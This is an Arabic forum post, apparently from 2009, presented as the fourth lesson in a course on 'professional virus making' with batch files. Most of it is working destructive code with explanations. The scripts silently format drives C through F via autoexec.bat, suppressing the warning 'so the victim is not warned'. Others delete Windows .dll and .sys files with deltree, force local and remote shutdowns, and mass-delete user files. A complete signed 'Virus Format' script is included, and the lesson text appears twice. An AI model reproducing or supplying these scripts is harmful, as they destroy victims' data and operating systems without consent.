seif bouzedi السبت ديسمبر 05, 2009 5:48 pmبسم الله الرحمن الرحيم
الدرس الرابع:
للاحتراف صناعة الفيروسات
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
كود PHP:
call attrib -h -r c:autoexec.bat >nul
2.هذا الكود للفورمات
كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat
3.هذا كود للفورمات لكن بالختصار
كود PHP:
echo & /autotest >nul >>c:autoexec.bat
ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
4.هذا كود فورمات كل الاقراص |385|
كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
5.هذا كود فيروس العد التنازلي و علاجه :
كود PHP:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود PHP:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى >nul >>c:autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يال
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
كود PHP:
call attrib -h -r c:autoexec.bat >nul
ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
كود PHP:
call attrib -h -r c:autoexec.bat >nul
(اساسى)
كود PHP:
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
كود PHP:
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
كود PHP:
echo كود الدوس >nul >>c:autoexec.bat
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
c: دخلنا على السى
كود PHP:
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
كود PHP:
deltree /y *.dll
الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
كود PHP:
deltree /y *.sys
و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End
كود PHP:
call attrib -h -r c:autoexec.bat >nul
Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم
كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat
Format : امر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الامر Echo
اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
تحياتي
الدرس الرابع:
للاحتراف صناعة الفيروسات
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...
1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
كود PHP:
call attrib -h -r c:autoexec.bat >nul
2.هذا الكود للفورمات
كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat
3.هذا كود للفورمات لكن بالختصار
كود PHP:
echo & /autotest >nul >>c:autoexec.bat
ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
4.هذا كود فورمات كل الاقراص |385|
كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
5.هذا كود فيروس العد التنازلي و علاجه :
كود PHP:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود PHP:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى >nul >>c:autoexec.bat
والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يال
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
كود PHP:
call attrib -h -r c:autoexec.bat >nul
ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
كود PHP:
call attrib -h -r c:autoexec.bat >nul
(اساسى)
كود PHP:
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
كود PHP:
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
كود PHP:
echo كود الدوس >nul >>c:autoexec.bat
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
c: دخلنا على السى
كود PHP:
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
كود PHP:
deltree /y *.dll
الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
كود PHP:
deltree /y *.sys
و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End
كود PHP:
call attrib -h -r c:autoexec.bat >nul
Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم
كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat
Format : امر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الامر Echo
اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
تحياتي
» ............................secren.2
» طريقة لاختراق الايميل بدون معرفة الاي بي وغيره سهله وبدون باتش
» حصريا شرح بالصور لطريقة لعب GTA SAN ANDREAS ONLINE اونلاين, شرح تشغل SAN ANDREAS MULTIPLAYER
» ¤©][©¤ مع ثاني اصدارات المعشوقة 2 Call of Duty ¤©][©¤ مع العقارب
» صنع فيروسات من نوع (أخر)لتدمير الكمبيوترات
» الإختراق عن طريق ملفات التجسس
» اختراق المواقع
» Win32/Skytap.A – فيروس للتنصت علي Skype